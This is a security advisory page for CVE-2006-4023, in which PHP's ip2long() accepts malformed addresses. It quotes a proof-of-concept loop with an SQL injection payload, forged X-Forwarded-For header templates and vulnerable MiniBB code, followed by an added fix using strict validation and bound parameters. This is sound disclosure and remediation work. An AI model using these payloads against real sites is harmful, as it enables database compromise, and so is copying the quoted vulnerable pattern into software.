SecurityTracker.com
Category:   Application (Generic)  >   PHP
Vendors:   PHP Group
PHP Error in ip2long() May Let Remote Users Inject SQL Commands Via Applications That Use the Function for Validation
SecurityTracker Alert ID:  1016609
SecurityTracker URL:  http://securitytracker.com/id/1016609
CVE Reference:   CVE-2006-4023
Updated:  Jun 8 2008
Original Entry Date:  Jul 31 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 4.3.3, 5.0.2; possibly others
Description:   rgod reported a vulnerability in PHP in the ip2long() function. A remote user may be able to inject SQL commands via applications that use the function for validation prior to SQL queries.

The ip2long() function may incorrectly return a valid IPv4 network address when the ip address input value is not valid. If an application uses the function to determine whether a user-supplied IP address is valid or not before using the address in an SQL query, then SQL injection may be possible.

The specific impact depends on the application that uses the vulnerable function.

The original advisory is available at:

http://retrogod.altervista.org/php_ip2long.html

Impact:   In certain cases, a remote user may be able to inject SQL commands via an application that uses the ip2long() function for input validation purposes prior to an SQL query.

The specific impact depends on the application that uses the vulnerable function.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.php.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP ip2long() function circumvention

--- PHP ip2long() function circumvention --------------------------------------

tested on php 5.0.2 and 4.3.3
--------------------------------------------------------------------------------
after some tests on the miniBB application (http://www.minibb.net/) I found that
the php ip2long() function can be tricked to return a valid IPv4 Internet
network address instead of "-1" even if the ip address argument is not a valid
one, through the injection of some chars, ex:

<?php
 // try every byte value between a valid address and trailing SQL text;
 // on PHP 4.3/5.0 ip2long() returns -1 for an address it rejects
 for ($i=0; $i<=255; $i++)
 {
  echo $i.":".ip2long("1.1.1.1".chr($i)."'or'a'='a'/*")."\r\n";
 }
?>

when chr($i) is chr(0), chr(9), chr(10), chr(11), chr(12), chr(13) or chr(32)

it gives the following (valid) result:

16843009

in the minibb case this could result in sql injection, forging a header like this:

X-FORWARDED-FOR: 1.1.1.1[CHR(9)]'[SQL CODE]

or even like this:

X-FORWARDED-FOR: 1[CHR(9)]'[SQL CODE]

(however Minibb limits the string to 15 chars, so you will have an unuseful twelve
chars sql injection...)
also remember that HTTP headers are not filtered by PHP magic_quotes_gpc, so this
could give an attacker the way to fully compromise an application

code taken from MiniBB 2.0
index.php, 248-264
/* Banned IPs/IDs stuff */
$thisIp=getIP();                      <--------------------- here $thisIp becomes our sql code
$cen=explode('.', $thisIp);

if(isset($cen[0]) and isset($cen[1]) and isset($cen[2])){
$thisIpMask[0]=$cen[0].'.'.$cen[1].'.'.$cen[2].'.+';
$thisIpMask[1]=$cen[0].'.'.$cen[1].'.+';
}
else {
$thisIpMask[0]='0.0.0.+';
$thisIpMask[1]='0.0.0.+';
}

if (db_ipCheck($thisIp,$thisIpMask,$user_id)) { //<-----------  $thisIp is passed to the db_ipCheck() function
$title=$sitename." :: ".$l_accessDenied;
echo ParseTpl(makeUp('main_access_denied')); exit;
}

bb_functions.php, near lines 123-131
//--------------->
function getIP(){
$ip1=getenv('REMOTE_ADDR');$ip2=getenv('HTTP_X_FORWARDED_FOR');
if ($ip2!='' and ip2long($ip2)!=-1) $finalIP=$ip2; else $finalIP=$ip1; //<-- vulnerable code
$finalIP=substr($finalIP,0,15);
return $finalIP;
}

//--------------->

setup_mysql.php, near lines 99-105:

function db_ipCheck($thisIp,$thisIpMask,$user_id){
$res=mysql_query('select id from '.$GLOBALS['Tb'].' where
banip='."'".$thisIp."'".' or banip='."'".$thisIpMask[0]."'".' or //<--- sql injection
banip='."'".$thisIpMask[1]."'".' or banip='."'".$user_id."'");
echo mysql_error();
if($res and mysql_num_rows($res)>0) return TRUE; else return FALSE;
}

--------------------------------------------------------------------------------
1.05 29/07/2006
rgod
http://retrogod.altervista.org/php_ip2long.html
--------------------------------------------------------------------------------
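As an added example (not MiniBB's or PHP's own code), the two fixes a maintainer would apply to the code quoted above: a client-address check that accepts only an exact dotted quad, so the whitespace- or NUL-terminated values that satisfy ip2long() fall back to REMOTE_ADDR, and the ban lookup rewritten with bound parameters. It assumes PHP 7 or later with mysqli; the function names, table name and probe values are constructed for the demonstration.

```php
<?php
// Added example, not MiniBB's or PHP's own code: a strict replacement for the
// getIP() check shown above, plus db_ipCheck() rewritten with bound parameters.
// Function names, the table name and the sample values are constructed here.

function strictClientIp(string $remoteAddr, string $forwardedFor): string
{
    // Exact dotted-quad syntax only. ip2long() (inet_aton underneath) stops
    // at whitespace or NUL and ignores the rest; this anchored regex does not.
    if (!preg_match('/\A(?:\d{1,3}\.){3}\d{1,3}\z/', $forwardedFor)) {
        return $remoteAddr;            // fall back to the socket peer address
    }
    // Range check on each octet; FILTER_VALIDATE_IP also fails on extra bytes.
    if (filter_var($forwardedFor, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return $remoteAddr;
    }
    return $forwardedFor;
}

function db_ipCheckSafe(mysqli $db, string $table, string $ip, array $masks, string $userId): bool
{
    // Table names cannot be bound, so whitelist the identifier instead.
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    // Same predicate as the original query, but the values travel as parameters.
    $stmt = $db->prepare("SELECT id FROM `$table` WHERE banip IN (?, ?, ?, ?)");
    $stmt->bind_param('ssss', $ip, $masks[0], $masks[1], $userId);
    $stmt->execute();
    $stmt->store_result();
    return $stmt->num_rows > 0;
}

// Constructed probes: the advisory's chr(9) payload, a NUL-padded value,
// an out-of-range octet, a proxy list, and a clean address.
$probes = [
    "1.1.1.1\t'or'a'='a'/*",
    "1\t'or'a'='a'/*",
    "1.1.1.1\0junk",
    "256.1.1.1",
    "1.1.1.1, 10.0.0.2",
    "1.1.1.1",
];
foreach ($probes as $p) {
    printf("%-24s -> %s\n", addcslashes($p, "\0..\37"), strictClientIp('10.0.0.9', $p));
}
// Only the last probe survives; every other one yields 10.0.0.9.
```

Note that from PHP 5.1 onward ip2long() returns false instead of -1 on failure, so the loose `ip2long($ip2)!=-1` test in the quoted getIP() passes for every non-empty header value, not just the whitespace-terminated ones. Trusting X-Forwarded-For at all only makes sense behind a proxy the application operator controls.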
Copyright 2019, SecurityGlobal.net LLC